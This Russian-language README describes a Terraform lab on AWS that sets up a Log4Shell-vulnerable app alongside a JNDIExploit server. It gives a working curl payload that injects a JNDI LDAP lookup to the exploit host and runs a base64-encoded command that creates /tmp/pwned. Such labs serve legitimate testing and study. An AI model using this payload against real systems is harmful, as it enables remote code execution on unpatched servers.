
Terraform для развертывания уязвимого приложения и JDNIExploit для работы с CVE-2021-44228
Terraform для развертывания уязвимого приложения и JNDIExploit для работы с CVE-2021-44228
Этот terraform создает два экземпляра в VPC в облаке AWS.
Вам просто нужно экспортировать AWS_ACCESS_KEY_ID и AWS_SECRET_ACCESS_KEY
Один экземпляр — JNDIExploit.
Второй — Vulnerable-App для эксплуатации log4j
Пожалуйста, замените свой SSH-публичный ключ в terraform перед apply
terraform init
terraform plan
terraform apply --auto-approve
После развертывания на aws вы можете эксплуатировать его с помощью curl-запроса и проверить создание файла в /tmp в контейнере vulnerable-app.
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
На сервере уязвимого приложения выполните следующую команду, чтобы проверить выполнение команды. Вы должны увидеть файл pwned
sudo docker exec -ti vulnerable-app ls /tmp